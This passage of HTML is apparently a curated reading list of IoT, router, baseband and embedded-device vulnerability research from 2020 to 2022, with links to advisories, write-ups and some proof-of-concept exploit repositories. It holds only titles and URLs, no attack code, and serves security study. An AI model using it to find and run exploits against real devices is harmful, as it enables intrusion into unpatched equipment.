</a> <a href="https://doar-e.github.io/blog/2022/03/26/competing-in-pwn2own-2021-austin-icarus-at-the-zenith/">Detail</a></li><li><a href="https://www.claroty.com/2022/02/10/blog-research-securing-network-management-systems-moxa-mxview/">Moxa MXview Network Management System Vulnerabilities Patched</a></li><li><a href="https://shufflingbytes.com/posts/hacking-goip-gsm-gateway/">GoIP-1 GSM gateway could be harnessed for phone fraud by hackers</a></li><li><a href="https://www.iot-inspector.com/blog/advisory-western-digital-my-cloud-pro-series-pr4100-rce/">Advisory: Western Digital My Cloud Pro Series PR4100 RCE - IoT Inspector (command injection)</a></li><li><a href="https://hacefresko.github.io/posts/tp-link-tapo-c200-unauthenticated-rce">TP-Link Tapo c200 Unauthenticated RCE (command injection)</a></li><li><a href="https://sensepost.com/blog/2022/sim-hijacking/">Sim hijacking</a></li><li><a href="https://www.nowsecure.com/blog/2022/02/09/a-zero-click-rce-exploit-for-the-peloton-bike-and-also-every-other-unpatched-android-device/?utm_source=twitter&utm_medium=social">Zero-Click RCE Exploit for the Peloton Bike Identified and Patched (nowsecure.com)</a></li><li><a href="https://ragnarsecurity.medium.com/reverse-engineering-bare-metal-kernel-images-part-2-6a52a4afa3ef">Reverse Engineering Bare Metal Firmware Images — Part 2 | by Ragnar Security</a></li><li><a href="https://www.deadf00d.com/post/how-i-hacked-sonos-and-youtube-the-same-day.html">How I hacked SONOS and YouTube the same day</a></li><li><a href="https://www.trendmicro.com/en_us/research/22/a/lorawans-protocol-stacks-the-forgotten-targets-at-risk.html">LoRaWAN’s Protocol Stacks: The Forgotten Targets at Risk</a> <a href="https://documents.trendmicro.com/images/TEx/pdf/Technical-Brief---LoRaWANs-Protocol-Stacks-The-Forgotten-Targets-at-Risk.pdf">Whitepaper</a></li><li><a href="https://hernan.de/research/papers/firmwire-ndss22-hernandez.pdf">FIRMWIRE: Transparent Dynamic Analysis for Cellular Baseband 
Firmware</a></li><li><a href="https://ssd-disclosure.com/ssd-advisory-uniview-preauth-rce/">Uniview PreAuth RCE - SSD Secure Disclosure (stack overflow)</a></li><li><a href="http://www.tomtombinary.xyz/articles/pi-gpu/">Raspberry Pi - GPU Exploitation</a></li><li><a href="https://github.com/jbaines-r7/badblood">CVE-2021-20038: SonicWall SMA-100 Unauth RCE Exploit (stack overflow)</a></li><li><a href="https://www.sentinelone.com/labs/cve-2021-45608-netusb-rce-flaw-in-millions-of-end-user-routers/">CVE-2021-45608: NetUSB RCE Flaw in Millions of End User Routers</a></li><li><a href="https://haxx.in/posts/dumping-the-amlogic-a113x-bootrom/">Dumping the Amlogic A113X Bootrom</a></li><li><a href="https://mp.weixin.qq.com/s/LBV84tel2miuZk_wxOAcRA">PowerPC PWN: from basics to practice</a></li><li><a href="https://www.synacktiv.com/en/publications/hunting-mobile-devices-endpoints-the-rf-and-the-hard-way">Hunting mobile devices endpoints - the RF and the Hard way</a></li><li><a href="https://blog.exodusintel.com/2017/07/26/broadpwn/">Broadpwn: Remotely Compromising Android and iOS via a Bug in Broadcom’s Wi-Fi Chipsets</a></li><li><a href="https://medium.com/@sayliambure/hacking-a-5-smartband-824763ab6e8f">Hacking a $5 Smartband.</a></li><li><a href="https://research.checkpoint.com/2021/security-probe-of-qualcomm-msm/">Security probe of Qualcomm MSM data services</a></li><li><a href="https://www.flashback.sh/blog/flashback-connects-cisco-rv340-ssl-vpn-rce">FLASHBACK CONNECTS - Cisco RV340 SSL VPN RCE</a></li><li><a href="https://doar-e.github.io/blog/2022/03/26/competing-in-pwn2own-2021-austin-icarus-at-the-zenith/">Competing in Pwn2Own 2021 Austin: Icarus at the Zenith</a></li></ul><h2 id="2021"><a href="#2021" class="headerlink" title="2021"></a>2021</h2><ul><li><a href="https://cpr-zero.checkpoint.com/vulns/cprid-2179/">CPR-Zero: CVE-2020-11292 QUALCOMM SNAPDRAGON AUTO VOICE 
SERVICE OF BUFFER OVERFLOW</a></li><li><a href="https://mp.weixin.qq.com/s/IY6j0v9pG4j-JlozEk7Jzw">Cracking and attacking smart door locks</a></li><li><a href="https://infosecwriteups.com/full-disclosure-hideez-key-2-fail-how-a-good-idea-turns-into-a-spf-security-product-failure-c90a4533fda9">Hideez Key 2 FAIL: How a good idea turns into a SPF (Security Product Failure)</a></li><li><a href="https://do1alx.de/2022/reverse-engineering-radios-arm-binary-images-in-ida-pro/">Reverse Engineering Radios - ARM Binary Images in IDA Pro</a></li><li><a href="https://blog.talosintelligence.com/2021/12/vuln-spotlight-garrett-metal-detector.html">Vulnerabilities in metal detector peripheral could allow attackers to manipulate security devices</a></li><li><a href="https://landaire.net/reversing-yaesu-firmware-encryption/">Reverse Engineering Yaesu FT-70D Firmware Encryption</a></li><li><a href="https://paper.seebug.org/1808/">CVE-2021-42342 GoAhead remote command execution vulnerability: in-depth analysis and reproduction</a></li><li><a href="https://www.cisa.gov/uscert/ics/advisories/icsa-21-119-04">Multiple RTOS (Update D) | CISA</a></li><li><a href="https://www.tenable.com/security/research/tra-2021-57">Netgear Nighthawk R6700 Multiple Vulnerabilities (command injection, plaintext storage)</a></li><li><a href="https://penthertz.com/blog/Intruding-5G-core-networks-from-outside-and_inside.html">Intruding 5G SA core networks from outside and inside</a></li><li><a href="https://research.nccgroup.com/2021/11/16/exploit-the-fuzz-exploiting-vulnerabilities-in-5g-core-networks/">Exploit the Fuzz – Exploiting Vulnerabilities in 5G Core Networks</a></li><li><a href="https://eddiez.me/hacking-the-nokia-fastmile/">Hacking the Nokia Fastmile</a></li><li><a href="https://blog.redteam-pentesting.de/2021/inside-a-pbx/">Discovering a Firmware Backdoor</a> <a 
href="https://tttang.com/archive/1398/">Translation</a></li><li><a href="https://arxiv.org/pdf/2112.05719.pdf">Attacks on Wireless Coexistence: Exploiting Cross-Technology Performance Features for Inter-Chip Privilege Escalation</a></li><li><a href="https://labs.f-secure.com/publications/printing-shellz">CVE-2021-39238: Printing Shellz: affects more than 150 HP multi-function printers</a> <a href="https://labs.f-secure.com/assets/BlogFiles/Printing-Shellz.pdf">Whitepaper</a> <a href="https://blog.f-secure.com/hp-printer-vulnerabilities/">FAQ</a></li><li><a href="https://www.reddit.com/r/hacking/comments/ksanug/how_we_hacked_a_tplink_router_and_took_home_55000/">How We Hacked a TP-Link Router and Took Home $55.000 in Pwn2Own: hacking</a> <a href="https://youtu.be/zjafMP7EgEA">Video</a></li><li><a href="https://research.nccgroup.com/2021/11/12/technical-advisory-multiple-vulnerabilities-in-victure-wr1200-wifi-router-cve-2021-43282-cve-2021-43283-cve-2021-43284/">Multiple Vulnerabilities in Victure WR1200 WiFi Router (guessable password, command injection)</a></li><li><a href="https://www.iot-inspector.com/blog/advisory-cisco-rv34x-series-privilege-escalation-vpntimer/">Cisco RV34X Series - Privilege Escalation in vpnTimer (privilege escalation)</a></li><li><a href="https://github.com/grimm-co/NotQuite0DayFriday/tree/trunk/2021.11.16-netgear-upnp">CVE-2021-34991: Netgear SOHO Devices upnpd Service Pre-Authentication Stack Overflow</a></li><li><a href="https://k4m1ll0.com/cve-2021-41653.html">CVE-2021-41653: TP-Link TL-WR840N V5(EU) (command injection)</a></li><li><a href="https://p1kk.github.io/2021/03/29/iot/Tenda AC15 CVE-2018-5767 CVE-2020-10987/">Fuzz testing with Tenda AC15 CVE-2018-5767 as an example</a></li><li><a href="http://www.righto.com/2021/11/reverse-engineering-yamaha-dx7.html">Reverse-engineering the Yamaha DX7 synthesizer’s sound chip from die 
photos</a></li><li><a href="https://blog.scrt.ch/2021/11/15/tpm-sniffing">TPM sniffing</a></li><li><a href="https://securitylab.github.com/research/qualcomm_npu">Fall of the machines: Exploiting the Qualcomm NPU (neural processing unit) kernel driver</a></li><li><a href="https://www.forescout.com/blog/new-critical-vulnerabilities-found-on-nucleus-tcp-ip-stack/">NUCLEUS:13 - New Critical Vulnerabilities Found on Nucleus TCP/IP Stack</a></li><li><a href="https://wololo.net/2021/01/12/psp-release-baryon-sweeper-lets-you-unbrick-psp-2000-3000-pandora-battery-style/">Baryon Sweeper lets you unbrick PSP 2000/3000, Pandora battery style</a></li><li><a href="https://wzt.ac.cn/2021/11/02/TFC2021-AX56U/">Tianfu Cup 2021 RT-AX56U RCE</a></li><li><a href="https://sec-consult.com/vulnerability-lab/advisory/critical-vulnerabilities-in-altus-sistemas-de-automacao-products/">Critical Vulnerabilities in Altus Sistemas de Automacao products (command injection, hardcoding, CSRF)</a></li><li><a href="https://sec-consult.com/vulnerability-lab/advisory/critical-vulnerabilities-in-hikam-high-infinity-technology/">Critical Vulnerabilities in HiKam - High Infinity Technology (authentication bypass, information disclosure, ...)</a></li><li><a href="https://research.nccgroup.com/2021/10/11/the-challenges-of-fuzzing-5g-protocols/">The Challenges of Fuzzing 5G Protocols</a></li><li><a href="https://research.nccgroup.com/2021/10/06/technical-advisory-open5gs-stack-buffer-overflow-during-pfcp-session-establishment-on-upf-cve-2021-41794/">CVE-2021-41794: Open5GS Stack Buffer Overflow During PFCP Session Establishment on UPF</a></li><li><a href="https://www.synacktiv.com/publications/your-vulnerability-is-in-another-oem.html">Your vulnerability is in another OEM! 
(Western Digital PR4100 NAS)</a></li><li><a href="https://www.iot-inspector.com/blog/advisory-cisco-ata19x-privilege-escalation-rce/">CVE-2021-34710: Cisco ATA19X Privilege Escalation and RCE - IoT Inspector (command injection)</a></li><li><a href="https://www.cyberark.com/resources/threat-research-blog/cracking-wifi-at-scale-with-one-simple-trick">Cracking WiFi at Scale with One Simple Trick</a></li><li><a href="https://www.iot-inspector.com/blog/broadcom-sdk-vulnerabilities-bug-reports/">Swimming Upstream: Uncovering Broadcom SDK vulnerabilities from bug reports (SSDP M-SEARCH overflow)</a></li><li><a href="https://www.trendmicro.com/fr_fr/research/21/j/forced-entry-a-security-test-for-automatic-garage-doors.html">Forced Entry: A Security Test for Automatic Garage Doors</a> <a href="https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/j/forced-entry-a-security-test-for-automatic-garage-doors/TechnicalBrief-A-Security-Analysis-of-Garage-Door-Remotes-and-the-Danger-of-DOR-Attacks.pdf">Detail</a></li><li><a href="https://insinuator.net/2021/10/change-your-ble-passkey-like-you-change-your-underwear/">Change Your BLE Passkey Like You Change Your Underwear</a></li><li><a href="https://www.somersetrecon.com/blog/2021/hacking-the-furbo-part-1">Hacking the Furbo Dog Camera: Part I</a></li><li><a href="https://www.somersetrecon.com/blog/2021/hacking-the-furbo-dog-camera-part-ii">Hacking the Furbo Dog Camera: Part II</a></li><li><a href="https://swarm.ptsecurity.com/cisco-hyperflex-how-we-got-rce-through-login-form-and-other-findings/">Cisco Hyperflex: How We Got RCE Through Login Form and Other Findings</a></li><li><a href="https://medium.com/geekculture/hacking-lg-webos-smart-tvs-using-a-phone-3fedba5d6f50">Hacking LG WebOS Smart TVs Using A Phone</a></li><li><a href="https://ssd-disclosure.com/ssd-advisory-dd-wrt-upnp-buffer-overflow/">DD-WRT UPNP Buffer Overflow (buffer overflow)</a></li><li><a 
href="https://www.iot-inspector.com/blog/broadcom-sdk-vulnerabilities-bug-reports/">Swimming Upstream: Uncovering Broadcom SDK Vulnerabilities from Bug Reports (heap overflow)</a></li><li><a href="https://www.bitdefender.com/files/News/CaseStudies/study/402/Bitdefender-PR-Whitepaper-VictureIPC-creat5590-en-EN.pdf">Cracking the Victure IPC360 Monitor (improper access control, buffer overflow, proprietary protocol analysis)</a></li><li><a href="https://github.com/mcw0/PoC/blob/master/Dahua%20authentication%20bypass.txt">Dahua authentication bypass</a></li><li><a href="https://learncctv.com/how-to-reset-h-264-network-dvr/">How to reset H.264 Network DVR (for lost password)</a></li><li><a href="https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html">Unauthenticated Remote Code Execution (RCE) vulnerability in Hikvision IP camera/NVR firmware (CVE-2021-36260)</a> <a href="https://github.com/Aiminsun/CVE-2021-36260/blob/main/CVE-2021-36260.py">POC</a></li><li><a href="https://www.nksc.lt/doc/en/analysis/2021-08-23_5G-CN-analysis_env3.pdf">ANALYSIS OF PRODUCTS MADE BY Huawei, Xiaomi and OnePlus</a></li><li><a href="https://blog.grimm-co.com/2021/09/mama-always-told-me-not-to-trust.html">Mama Always Told Me Not to Trust Strangers without Certificates</a></li><li><a href="https://www.shielder.it/advisories/qnap-musicstation-malwareremover-pre-auth-remote-code-execution/?utm_source=pocket_mylist">QNAP MusicStation/MalwareRemover Pre-Auth Remote Code Execution</a></li><li><a href="https://github.com/nanomq/nanomq/issues/203?fbclid=IwAR0dfQrgHknG6ZsEv5WDJnpzaxyjUdQ-BtLC0ON4RkJHQm6dnB1HA4Bu1w8">NanoMQ: Improper Handling of Payload Length</a></li><li><a href="https://nns.ee/blog/2021/04/03/modem-rce.html">Code execution as root via AT commands on the Quectel EG25-G modem</a></li><li><a href="https://infosecwriteups.com/full-disclosure-0-day-rce-backdoor-in-teradek-ip-video-device-firmwares-85a16f346e15">Full disclosure: 0-day RCE backdoor in Teradek IP video device firmwares</a></li><li><a 
href="https://research.checkpoint.com/2021/i-can-take-over-your-kindle/">Do you like to read? I can take over your Kindle with an e-book</a></li><li><a href="https://www.pentestpartners.com/security-blog/breaking-the-android-bootloader-on-the-qualcomm-snapdragon-660/">Breaking the Android Bootloader on the Qualcomm Snapdragon 660</a></li><li><a href="https://bbs.pediy.com/thread-268758.htm">Cisco RV160W series router vulnerabilities: from 1-day analysis to 0-day hunting</a></li><li><a href="https://bbs.pediy.com/thread-268623.htm">Home router vulnerability hunting case study: an illustrated walkthrough of multiple D-Link DIR-815 overflow vulnerabilities</a></li><li><a href="https://www.iot-inspector.com/blog/advisory-multiple-issues-realtek-sdk-iot-supply-chain/">Advisory: Multiple Issues in Realtek SDK Affects Hundreds of Thousands of Devices Down the Supply Chain</a></li><li><a href="https://tnpitsecurity.com/blog/gaining-root-on-sonos-speakers/">Gaining root access on Sonos Play (1st gen and 2nd gen ‘One’) (DMA attack)</a></li><li><a href="https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2">Bypassing Authentication on Arcadyan Routers with CVE-2021-20090 and rooting some Buffalo</a></li><li><a href="https://starlabs.sg/blog/2021/08/identifying-bugs-in-router-firmware-at-scale-with-taint-analysis/">Identifying Bugs in Router Firmware at Scale with Taint Analysis</a></li><li><a href="https://www.cyberark.com/resources/threat-research-blog/bypassing-windows-hello-without-masks-or-plastic-surgery">Bypassing Windows Hello Without Masks or Plastic Surgery</a></li><li><a href="https://blog.zecops.com/research/meet-wifidemon-ios-wifi-rce-0-day-vulnerability-and-a-zero-click-vulnerability-that-was-silently-patched/">Meet WiFiDemon: iOS WiFi RCE 0-Day Vulnerability & a ‘Zero-Click’ Vulnerability That was Silently Patched</a></li><li><a href="https://labs.sentinelone.com/cve-2021-3438-16-years-in-hiding-millions-of-printers-worldwide-vulnerable/">CVE-2021-3438: 16 Years In Hiding - Millions of Printers Worldwide 
Vulnerable</a> <a href="https://voidsec.com/root-cause-analysis-of-cve-2021-3438/">Analysis</a></li><li><a href="https://bbs.pediy.com/thread-268572.htm">Analysis of the BLE communication of the Yunding Loock door lock</a></li><li><a href="https://zhuanlan.zhihu.com/p/391832240">CVE-2021-35973: Netgear WAC104 authentication bypass</a></li><li><a href="https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/">UDP Technology IP Camera vulnerabilities</a></li><li><a href="https://alephsecurity.com/2021/07/15/aruba-instant/">Aruba in Chains: Chaining Vulnerabilities for Fun and Profit</a></li><li><a href="https://www.esat.kuleuven.be/cosic/blog/dumping-and-extracting-the-spacex-starlink-user-terminal-firmware/">Dumping and extracting the SpaceX Starlink User Terminal firmware</a></li><li><a href="https://rbaron.net/blog/2021/07/06/Reverse-engineering-the-M6-smart-fitness-band.html">Reverse Engineering the M6 Smart Fitness Bracelet</a> <a href="https://www.4hou.com/posts/L04g">Chinese translation</a></li><li><a href="https://github.com/pvvx/ATC_MiThermometer">ATC_MiThermometer: Custom firmware for the Xiaomi Thermometers and Telink Flasher via USB to Serial converter (SWire Debug)</a></li><li><a href="https://www.microsoft.com/security/blog/2021/06/30/microsoft-finds-new-netgear-firmware-vulnerabilities-that-could-lead-to-identity-theft-and-full-system-compromise/">Microsoft finds new NETGEAR firmware vulnerabilities that could lead to identity theft and full system compromise (authentication bypass, side channel)</a> <a href="https://www.anquanke.com/post/id/246028">Chinese translation</a></li><li><a href="https://www.anquanke.com/post/id/183998">How to pwn your own optical network terminal (backdoor, command injection)</a></li><li><a href="https://bbs.pediy.com/thread-268031.htm">Notes on pwning a gateway device: smart devices (hard-coded credentials, stack overflow)</a></li><li><a href="https://www.cnblogs.com/hac425/p/14872442.html">Vulnerability hunting in open-source USB protocol stacks</a></li><li><a href="https://bbs.pediy.com/thread-267916.htm">Fitness band BLE authentication bypass enabling remote control</a></li><li><a href="https://research.checkpoint.com/2021/pwn2own-qualcomm-dsp/">Pwn2Own Qualcomm DSP</a></li><li><a 
href="https://www.zerodayinitiative.com/blog/2021/5/24/cve-2021-22909-digging-into-a-ubiquiti-firmware-update-bug">DIGGING INTO A UBIQUITI FIRMWARE UPDATE BUG (curl -k insecure option, MITM)</a></li><li><a href="https://sec-consult.com/vulnerability-lab/advisory/multiple-critical-vulnerabilities-in-korenix-technology-westermo-pepperl-fuchs/">Multiple Critical Vulnerabilities in Korenix Technology, Westermo and Pepperl+Fuchs products</a></li><li><a href="https://airbus-seclab.github.io/#2021">Attacking Xerox multi function printers</a> <a href="https://delikely.github.io/2099/01/01/IOT-Vulns/syscall.eu/pdf/INFILTRATE2020-RIGO-Xerox-final.pdf">Slide</a> <a href="https://vimeo.com/showcase/8085537/video/539693997">Video</a></li><li><a href="https://elongl.github.io/exploitation/2021/05/30/pwning-home-router.html">Pwning Home Router - Linksys WRT54G</a></li><li><a href="https://gynvael.coldwind.pl/?id=733">NETGEAR Switches Pre-Authentication Command Injection</a></li><li><a href="https://msrc-blog.microsoft.com/2021/04/29/badalloc-memory-allocation-vulnerabilities-could-affect-wide-range-of-iot-and-ot-devices-in-industrial-medical-and-enterprise-networks/">BadAlloc: Memory allocation vulnerabilities could affect wide range of IoT and OT devices</a></li><li><a href="https://positive.security/blog/send-my">Send My: Arbitrary data transmission via Apple’s Find My network</a></li><li><a href="https://naehrdine.blogspot.com/2021/04/bluetooth-wi-fi-code-execution-wi-fi.html">Bluetooth → Wi-Fi Code Execution & Wi-Fi Debugging</a></li><li><a href="https://www.vdoo.com/blog/realtek-wifi-vulnerabilities-zero-day">Realtek RTL8710C WPA2 handshake mechanism buffer overflow (buffer overflow)</a></li><li><a href="https://bbs.pediy.com/thread-265744.htm">CVE-2020-12351: analysis of a Linux Bluetooth module denial-of-service vulnerability</a></li><li><a href="https://blog.talosintelligence.com/2021/04/vuln-spotlight-co.html">Remote code execution vulnerabilities in Cosori smart air fryer (overflow, command execution)</a></li><li><a 
href="https://github.com/BenChaliah/Tenda_D151_D301_POC">Tenda D151 D301 exploit (unauthenticated configuration file download)</a></li><li><a href="https://ssd-disclosure.com/ssd-advisory-netgear-nighthawk-r7000-httpd-preauth-rce/">NETGEAR Nighthawk R7000 httpd PreAuth RCE (heap overflow)</a></li><li><a href="https://starlabs.sg/advisories/21-0254/">Junos OS overlayd service bss Buffer Overflow</a></li><li><a href="https://medium.com/tenable-techblog/inside-simplisafe-alarm-system-291a8c3e4d89">Inside SimpliSafe Alarm System</a></li><li><a href="https://quentinkaiser.be/security/2021/03/09/voodoo/">VOOdoo - Remotely Compromising VOO Cable Modems</a></li><li><a href="https://www.synacktiv.com/publications/dumping-the-sonos-one-smart-speaker.html">DUMPING THE SONOS ONE SMART SPEAKER</a></li><li><a href="https://www.synacktiv.com/en/publications/pwn2own-tokyo-2020-defeating-the-tp-link-ac1750.html">PWN2OWN TOKYO 2020: DEFEATING THE TP-LINK AC1750</a></li><li><a href="https://www.softscheck.com/en/reverse-engineering-tp-link-hs110/">Reverse Engineering the TP-Link HS110</a></li><li><a href="https://mp.weixin.qq.com/s/IY6j0v9pG4j-JlozEk7Jzw">Cracking and attacking smart door locks</a></li><li><a href="https://github.com/darrenmartyn/visualdoor">VisualDoor: SonicWall SSL-VPN Exploit</a></li><li><a href="https://mp.weixin.qq.com/s/o9v4V673ayyMTY1vGjveFg">Netgear firmware analysis and backdoor implantation</a></li><li><a href="https://www.crowdstrike.com/blog/pwn2own-tale-of-a-bug-found-and-lost-again/">Pwn2Own: A Tale of a Bug Found and Lost Again</a></li><li><a href="https://github.com/yumusb/EgGateWayGetShell_py">Ruijie Networks EWEB network management system (command injection)</a></li><li><a href="https://labs.ioactive.com/2021/02/a-practical-approach-to-attacking-iot.html">A Practical Approach To Attacking IoT Embedded Designs (I)</a></li><li><a href="https://research.nccgroup.com/2021/01/31/2020-annual-research-report/">NCC Group’s 2020 Annual Research Report</a></li><li><a href="https://www.vdoo.com/blog/realtek-rtl8195a-vulnerabilities-discovered">Major Vulnerabilities discovered and patched in Realtek RTL8195A Wi-Fi 
Module</a></li><li><a href="https://www.refirmlabs.com/florida-tech-cybersecurity-researchers-discover-hidden-vulnerabilities-in-wireless-doorbells-cameras/">Hidden Vulnerabilities in Wireless Doorbells, Cameras</a></li><li><a href="https://blog.0xlabs.com/2021/02/wavlink-rce-CVE-2020-13117.html">CVE-2020-13117: Wavlink Multiple AP Products: Unauthenticated Remote Root Command Execution</a></li><li><a href="https://security.tencent.com/index.php/blog/msg/181">IoT open-source component security: a Node-RED white-box audit</a></li><li><a href="https://www.fireeye.com/blog/threat-research/2021/02/solarcity-exploitation-of-x2e-iot-device-part-two.html">Shining a Light on SolarCity: Practical Exploitation of the X2e IoT Device (Part Two)</a></li><li><a href="https://www.fireeye.com/blog/threat-research/2021/02/solarcity-exploitation-of-x2e-iot-device-part-one.html">Shining a Light on SolarCity: Practical Exploitation of the X2e IoT Device (Part One)</a></li><li><a href="https://blog.recurity-labs.com/2021-02-03/webOS_Pt1.html">CVE-2020-XXXXX - Getting root on webOS</a> <a href="https://www.anquanke.com/post/id/231495">Chinese translation</a></li><li><a href="https://pierrekim.github.io/blog/2021-01-12-fiberhome-ont-0day-vulnerabilities.html">Multiple vulnerabilities found in FiberHome HG6245D routers</a></li><li><a href="https://www.jsof-tech.com/disclosures/dnspooq/">DNSpooq: 7 vulnerabilities in Dnsmasq</a></li><li><a href="https://research.nccgroup.com/2021/03/08/technical-advisory-multiple-vulnerabilities-in-netgear-prosafe-plus-jgs516pe-gs116ev2-switches/">Multiple Vulnerabilities in Netgear ProSAFE Plus JGS516PE / GS116Ev2 Switches</a></li><li><a href="https://pollevanhoof.be/nuggets/smart_cards/nespresso">Exploiting the Nespresso smart cards for fun and profit coffee</a></li><li><a href="https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/">Hongdian H8922 Multiple Vulnerabilities (hard-coded credentials / command injection)</a></li><li><a 
href="https://www.iot-inspector.com/blog/advisory-multiple-issues-libre-wireless-ls9/">Multiple Issues in Libre Wireless LS9 Modules (authentication bypass / information disclosure)</a></li><li><a href="https://www.iot-inspector.com/blog/advisory-d-link-dir-3060/">CVE-2021-28144: D-Link DIR-3060 Authenticated RCE (command injection)</a></li><li><a href="https://www.iot-inspector.com/blog/advisory-cisco-rv34x-authentication-bypass-remote-command-execution/">Cisco RV34X Series – Authentication Bypass and Remote Command Execution</a></li><li><a href="https://raycn.pub/2021/08/21/reset-xiaomi-air-purifier-filters/">[PM3] Resetting the Xiaomi air purifier filter</a></li><li><a href="https://medium.com/geekculture/reverse-engineering-bare-metal-firmware-part-3-analyzing-arm-assembly-and-exploiting-3b2dbe219f19">Reverse Engineering Bare-Metal Firmware — Part 3 | Analyzing ARM Assembly and Exploiting Vulnerabilities</a></li><li><a href="https://olegkutkov.me/2021/12/25/analysis-and-reverse-engineering-of-the-original-starlink-router/">Analysis and reverse-engineering of the original Starlink router</a></li></ul><h2 id="2020"><a href="#2020" class="headerlink" title="2020"></a>2020</h2><ul><li><a href="https://labs.withsecure.com/content/dam/labs/docs/2020-07-the-fake-cisco.pdf">Hunting for backdoors in Counterfeit Cisco devices</a></li><li><a href="https://raelize.com/blog/espressif-systems-esp32-controlling-pc-during-sb/">Espressif ESP32: Controlling PC during Secure Boot</a></li><li><a href="https://infosecwriteups.com/norec-attack-stripping-ble-encryption-from-nordics-library-cve-2020-15509-9798ab893b95">CVE-2020-15509 | Norec Attack: Stripping BLE encryption from Nordic’s Library</a></li><li><a href="https://www.trendmicro.com/en_us/research/20/i/exploitable-flaws-found-in-facial-recognition-devices.html">Exploitable Flaws Found in Facial Recognition Devices</a></li><li><a 
href="https://security.tencent.com/index.php/blog/msg/141">IoT security series: remotely hacking Google Home</a></li><li><a href="https://blog.zimperium.com/multiple-kernel-vulnerabilities-affecting-all-qualcomm-devices/">Kernel Vulnerabilities Affecting All Qualcomm Devices</a></li><li><a href="https://keenlab.tencent.com/zh/whitepapers/us-21-Over-The-Air-Baseband-Exploit-Gaining-Remote-Code-Execution-on-5G-Smartphones-wp.pdf">Over The Air Baseband Exploit: Gaining Remote Code Execution on 5G Smartphones</a></li><li><a href="https://i.blackhat.com/asia-21/Thursday-Handouts/as-21-Johnson-Unprotected-Broadcasts-In-Android-9-and-10-wp.pdf">(Un)protected Broadcasts in Android 9 and 10</a></li><li><a href="https://www.synacktiv.com/publications/treasure-chest-party-quest-from-doom-to-exploit">Zombies ate my printer’s ink: Attacking a Canon printer, from firmware gathering to remote code execution</a> <a href="https://www.synacktiv.com/sites/default/files/2022-06/thcon2021_canon_printer.pdf">Slide</a></li><li><a href="https://medium.com/@anderson_pablo/iptv-smarters-exploit-cve-2020-9380-22d4b21f5da7">CVE-2020-9380 IPTV Smarters Exploit</a> <a href="https://github.com/migueltarga/CVE-2020-9380">GitHub</a></li><li><a href="https://labs.f-secure.com/advisories/xiaomi-mi9/">CVE-2020-9530/9531: exploited the Xiaomi Mi9 through NFC tag</a></li><li><a href="https://zhuanlan.zhihu.com/p/245070099">CVE-2020-11959/11960: Logic bugs in practice: taking over a router with three vulnerabilities (Xiaomi AIoT Router AX3600)</a> <a href="https://hitcon.org/2020/slides/Exploit%20%28Almost%29%20All%20Xiaomi%20Routers%20Using%20Logical%20Bugs.pdf">Slides</a> <a href="https://www.bilibili.com/video/BV1gf4y1D7L2">Video</a></li><li><a href="https://bbs.hassbian.com/thread-11139-1-1.html">Reverse engineering the Xiao AI speaker root password</a></li><li><a href="https://blog.csftech.net/xiaomi-ai-speaker-authenticated-rce-i-firmware-analysis">CVE-2020-14096: Xiaomi AI Speaker Authenticated RCE (Part 1)</a> <a href="https://blog.csftech.net/xiaomi-ai-speaker-authenticated-rce-ii-how-does-mico-ota-update-work/">Part 2</a> <a 
href="https://blog.csftech.net/xiaomi-ai-speaker-authenticated-rce-iii-cve-2020-14096/">Part 3</a></li><li><a href="https://github.com/Jian-Xian/CVE-POC">XIAOMI AI speaker get root shell by accessing UART</a></li><li><a href="https://thehackernews.com/2021/01/secret-backdoor-account-found-in.html">CVE-2020-29583: Undocumented user account in Zyxel products</a></li><li><a href="https://www.claroty.com/2020/11/17/blog-research-rta-enip-stack-vulnerability/">LINGERING RTA ENIP STACK VULNERABILITY POSES RISK TO ICS DEVICES</a></li><li><a href="https://blog.netlab.360.com/another-lilin-dvr-0-day-being-used-to-spread-mirai/">LILIN DVR/NVR in-the-wild 0-day attack report (2)</a></li><li><a href="https://sick.codes/extraordinary-vulnerabilities-discovered-in-tcl-android-tvs-now-worlds-3rd-largest-tv-manufacturer/">Extraordinary Vulnerabilities Discovered in TCL Android TVs, Now World’s 3rd Largest TV Manufacturer</a></li><li><a href="https://sec-consult.com/en/blog/advisories/multiple-vulnerabilities-in-zte-wlan-router-mf253v/">MULTIPLE VULNERABILITIES IN ZTE WLAN ROUTER MF253V</a></li><li><a href="https://james-clee.com/2020/04/18/multiple-wavlink-vulnerabilities/">Multiple Vulnerabilities in Wavlink Router leads to Unauthenticated RCE – CVE-2020-10971 and CVE-2020-10972</a> <a href="https://james-clee.com/2020/04/23/more-information-disclosure-in-wavlink-devices/">More</a></li><li><a href="https://medium.com/tenable-techblog/tp-link-takeover-with-a-flash-drive-d493666f6b39">Crafting symbolic links to root a TP-Link AC1750</a></li><li><a href="https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/">Exploiting Samsung Router WLAN AP WEA453e</a></li><li><a href="https://alephsecurity.com/2020/10/14/ruckus-wireless-2/">Don’t Ruck Us Again - The Exploit Returns</a></li><li><a href="https://adepts.of0x.cc/ruckus-vriot-rce/">Remote Command Execution in Ruckus IoT Controller (CVE-2020-26878 & CVE-2020-26879)</a></li><li><a 
href="https://myakupa.github.io/write-up-damn-vulnerable-arm-router">[Write-up] Damn Vulnerable ARM Router</a></li><li><a href="https://www.pentestpartners.com/security-blog/smart-male-chastity-lock-cock-up/">Smart male chastity lock cock-up</a></li><li><a href="https://www.guardicore.com/2020/10/wareztheremote-turning-remotes-into-listening-devices/">WarezTheRemote: Turning Remotes Into Listening Devices</a></li><li><a href="https://asset-group.github.io/disclosures/sweyntooth/">SweynTooth Cybersecurity Vulnerabilities May Affect Certain Medical Devices: FDA Safety Communication</a> <a href="https://asset-group.github.io/disclosures/sweyntooth/sweyntooth.pdf">White Paper</a></li><li><a href="https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/red-team-tech-notes/-/tree/master/firefox-android-2020">Abuse UPnP, Firefox for Android LAN-Based Intent Triggering</a></li><li><a href="https://raelize.com/posts/espressif-esp32-bypassing-encrypted-secure-boot-cve-2020-13629/">Espressif ESP32: Bypassing Encrypted Secure Boot (CVE-2020-13629)</a></li><li><a 